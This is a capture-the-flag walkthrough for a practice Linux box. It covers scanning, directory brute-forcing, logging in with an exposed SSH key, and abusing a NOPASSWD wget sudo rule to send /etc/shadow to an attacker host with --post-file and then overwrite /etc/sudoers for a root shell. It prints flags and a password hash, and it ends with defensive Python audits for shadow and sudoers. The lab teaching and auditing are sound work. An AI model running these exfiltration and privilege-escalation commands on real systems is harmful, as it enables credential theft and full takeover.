Service discovery

┌──(root㉿kali)-[~]
└─# nmap -sV -Pn 10.10.106.99
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-25 23:41 EDT
Nmap scan report for 10.10.106.99
Host is up (0.38s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds
Directory brute-forcing

┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -u http://10.10.106.99 -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.3.8
 (_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627

Error Log: /root/dirsearch/logs/errors-21-09-25_23-42-55.log

Target: http://10.10.106.99

[23:42:56] Starting:
[23:42:58] 301 -  314B  - /sitemap  ->  http://10.10.106.99/sitemap/
[23:42:58] 200 -   11KB - /
CTRL+C detected: Pausing threads, please wait...
Canceled by the user
/sitemap is the landing page for a piece of software called UNAPP. Continue brute-forcing directories under it:

┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.106.99/sitemap/

  _|. _ _  _  _  _ _|_    v0.3.8
 (_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-09-26_02-39-06.log

Target: http://10.10.106.99/sitemap/

[02:39:07] Starting:
[02:39:09] 200 -   21KB - /sitemap/
[02:39:09] 301 -  319B  - /sitemap/images  ->  http://10.10.106.99/sitemap/images/
[02:39:11] 301 -  316B  - /sitemap/css  ->  http://10.10.106.99/sitemap/css/
[02:39:12] 301 -  315B  - /sitemap/js  ->  http://10.10.106.99/sitemap/js/
[02:39:19] 301 -  318B  - /sitemap/fonts  ->  http://10.10.106.99/sitemap/fonts/
[02:44:16] 301 -  317B  - /sitemap/sass  ->  http://10.10.106.99/sitemap/sass/
The About page lists the names of two developers:

Emily Turner
Adam Morris
Turned these into a list of candidate usernames and tried brute-forcing SSH with a small password dictionary. No result.

emilyturner
emilyturner
adammorris
adammorris
The page source of the homepage http://10.10.106.99/ contains one line of text:
Jessie don't forget to udate the webiste
That gives one confirmed username: jessie

At http://10.10.106.99/sitemap/.ssh/ an SSH login key is found:

Index of /sitemap/.ssh
[ICO]       Name         Last modified    Size  Description
[PARENTDIR] Parent Directory                -
[   ]       id_rsa       2019-10-26 09:24  1.6K
Apache/2.4.18 (Ubuntu) Server at 10.10.106.99 Port 80

With the username and the SSH key, log in to the target and collect the user flag:
┌──(root㉿kali)-[~/tryhackme/wgel]
└─# ssh -i id_rsa jessie@10.10.106.99
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

8 packages can be updated.
8 updates are security updates.

Last login: Sun Sep 26 11:59:45 2021 from 10.13.21.169
jessie@CorpOne:~$ find / -name user_flag.txt
find: ‘/var/cache/lightdm/dmrc’: Permission denied
find: ‘/var/cache/cups’: Permission denied
find: ‘/var/log/speech-dispatcher’: Permission denied
find: ‘/var/lib/apt/lists/partial’: Permission denied
find: ‘/var/lib/colord/.cache’: Permission denied
find: ‘/var/lib/snapd/void’: Permission denied
find: ‘/var/lib/snapd/cookie’: Permission denied
find: ‘/var/lib/udisks2’: Permission denied
find: ‘/var/lib/update-notifier/package-data-downloads/partial’: Permission denied
find: ‘/var/lib/lightdm-data/lightdm’: Permission denied
find: ‘/var/lib/lightdm’: Permission denied
find: ‘/var/lib/polkit-1’: Permission denied
/home/jessie/Documents/user_flag.txt
jessie@CorpOne:~$ cat /home/jessie/Documents/user_flag.txt
057c67131c3d5e42dd5cd3075b198ff6
Check sudo privileges:

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
Send the shadow file to the attacking machine:

1. Listen on the attacker: nc -lvnp 80
2. Send from the target: sudo -u root /usr/bin/wget --post-file=/etc/shadow 10.13.21.169
3. Receive:

┌──(root㉿kali)-[~/tryhackme/wgel]
└─# nc -lvnp 80
listening on [any] 80 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.106.99] 60216
POST / HTTP/1.1
User-Agent: Wget/1.17.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 10.13.21.169
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1273

root:!:18195:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:17954:0:99999:7:::
uuidd:*:17954:0:99999:7:::
lightdm:*:17954:0:99999:7:::
whoopsie:*:17954:0:99999:7:::
avahi-autoipd:*:17954:0:99999:7:::
avahi:*:17954:0:99999:7:::
dnsmasq:*:17954:0:99999:7:::
colord:*:17954:0:99999:7:::
speech-dispatcher:!:17954:0:99999:7:::
hplip:*:17954:0:99999:7:::
kernoops:*:17954:0:99999:7:::
pulse:*:17954:0:99999:7:::
rtkit:*:17954:0:99999:7:::
saned:*:17954:0:99999:7:::
usbmux:*:17954:0:99999:7:::
jessie:$6$0wv9XLy.$HxqSdXgk7JJ6n9oZ9Z52qxuGCdFqp0qI/9X.a4VRJt860njSusSuQ663bXfIV7y.ywZxeOinj4Mckj8/uvA7U.:18195:0:99999:7:::
sshd:*:18195:0:99999:7:::
The value in root's password field is "!", which means the account is locked. A locked account cannot log in with a password, but other login paths may still be open, such as SSH public-key authentication or su.

So we cannot escalate by replacing the shadow file.
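As an added defender-side check that is not part of the original write-up: a small audit that classifies each /etc/shadow entry by its password field ("!" locked, "*" no password, "$..." hashed, empty) and, given a caller-supplied set of accounts that have an authorized_keys file (an assumption, since the write-up does not list them), flags accounts whose password is locked but which remain reachable over SSH keys. The sample data is constructed and the jessie hash is a placeholder.

```python
# Constructed sample in /etc/shadow format, modelled on the dump above; the jessie
# hash is a placeholder, not the real one, and "legacy" is added to show an empty field.
SHADOW_SAMPLE = """\
root:!:18195:0:99999:7:::
daemon:*:17953:0:99999:7:::
speech-dispatcher:!:17954:0:99999:7:::
jessie:$6$examplesalt$constructedPlaceholderHashValue:18195:0:99999:7:::
sshd:*:18195:0:99999:7:::
legacy::17953:0:99999:7:::
"""

def classify(field):
    """Map the password field of a shadow entry to an account state."""
    if field == "":
        return "empty (password-less login)"
    if field.startswith("!"):
        return "locked"        # "!" alone, or "!" prefixed to a hash by passwd -l
    if field == "*":
        return "no password"   # system account; password authentication impossible
    if field.startswith("$"):
        return "hashed"
    return "unknown"

def audit_shadow(text, key_users=frozenset()):
    """Return {user: state}. key_users is the set of accounts that have an
    authorized_keys file (assumed to be supplied by the caller); a locked or
    starred password field refuses password logins only, not key-based SSH
    or su/sudo performed from an already-root context."""
    report = {}
    for line in text.splitlines():
        user, field = line.split(":")[:2]
        state = classify(field)
        if state in ("locked", "no password") and user in key_users:
            state += ", but SSH key login still possible"
        report[user] = state
    return report
```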
Privilege escalation approach

With wget we can in fact replace any file on the target, so now we try replacing /etc/sudoers: add the line jessie ALL=(root) NOPASSWD: /bin/bash to a copy of the sudoers file, then overwrite the sudoers file on the target with it. That lets us switch to a root bash without a password.

First send /etc/sudoers back to the attacking machine so it can be edited:

sudo -u root /usr/bin/wget --post-file=/etc/sudoers 10.13.21.169
Edit sudoers:

#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
jessie ALL=(root) NOPASSWD: /usr/bin/wget
jessie ALL=(root) NOPASSWD: /bin/bash
From the target, download the edited sudoers file over the original. Privilege escalation succeeds:

jessie@CorpOne:~$ sudo /usr/bin/wget http://10.13.21.169:8000/sudoers -O /etc/sudoers
--2021-09-26 12:45:55--  http://10.13.21.169:8000/sudoers
Connecting to 10.13.21.169:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 863 [application/octet-stream]
Saving to: ‘/etc/sudoers’

/etc/sudoers        100%[===================>]     863  --.-KB/s    in 0,001s

2021-09-26 12:45:55 (1,54 MB/s) - ‘/etc/sudoers’ saved [863/863]

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
    (root) NOPASSWD: /bin/bash
jessie@CorpOne:~$ sudo bash
root@CorpOne:~# cat /root/root_flag.txt
b1b968b37519ad1daa6408188649263d
root@CorpOne:~#
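The root cause of this box is a single sudoers rule: a NOPASSWD entry for an unrestricted /usr/bin/wget, which as root can both read (--post-file) and write (-O) any file, so the sudoers file itself is fair game. As an added defender-side check, not code from the write-up: a Python audit that parses sudoers user-specification rules and flags rules granting root-level file read/write or a root shell. The sample sudoers text is a constructed copy of the file shown above, and the binary lists are illustrative assumptions rather than a complete catalogue.

```python
import re

# Constructed, illustrative sets (not exhaustive): binaries that, run as root with
# caller-chosen arguments, read/write any file (wget --post-file / -O) or give a shell.
FILE_IO_BINARIES = {"/usr/bin/wget", "/usr/bin/curl", "/bin/cp", "/usr/bin/tee"}
SHELL_BINARIES = {"/bin/bash", "/bin/sh", "/bin/dash"}

# Constructed copy modelled on the edited sudoers file shown in the write-up.
SUDOERS_SAMPLE = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
#includedir /etc/sudoers.d
jessie ALL=(root) NOPASSWD: /usr/bin/wget
jessie ALL=(root) NOPASSWD: /bin/bash
"""

# user  host=(runas[:group])  [TAG: ...]  cmd[, cmd...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
                     r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")
SKIP = ("Defaults", "Host_Alias", "User_Alias", "Cmnd_Alias", "Runas_Alias")

def parse_sudoers(text):
    """Return (user, runas_user, nopasswd, command) for every user-specification rule."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drops comments and #include* lines
        if not line or line.startswith(SKIP):
            continue
        m = RULE_RE.match(line)
        if m:
            runas = m.group("runas").split(":")[0].strip()
            nopasswd = "NOPASSWD:" in m.group("tags")
            for cmd in m.group("cmds").split(","):
                rules.append((m.group("user"), runas, nopasswd, cmd.strip()))
    return rules

def audit(text):
    """Flag rules that give a user root-level file access or a root shell."""
    findings = []
    for user, runas, nopasswd, cmd in parse_sudoers(text):
        if runas not in ("root", "ALL"):
            continue
        argv, tag = cmd.split(), ("NOPASSWD" if nopasswd else "password required")
        # Bare binary: the caller picks every argument. Explicit arguments pin the command line.
        if argv[0] in FILE_IO_BINARIES and len(argv) == 1:
            findings.append(f"{user}: {cmd} as root ({tag}) allows arbitrary file read/write as root")
        elif argv[0] in SHELL_BINARIES:
            findings.append(f"{user}: {cmd} as root ({tag}) is a direct root shell")
    return findings
```

Run it against the real file with `audit(open("/etc/sudoers").read())` as root; the fix for a hit is to remove the rule or replace it with a wrapper script that hard-codes the URL and output path.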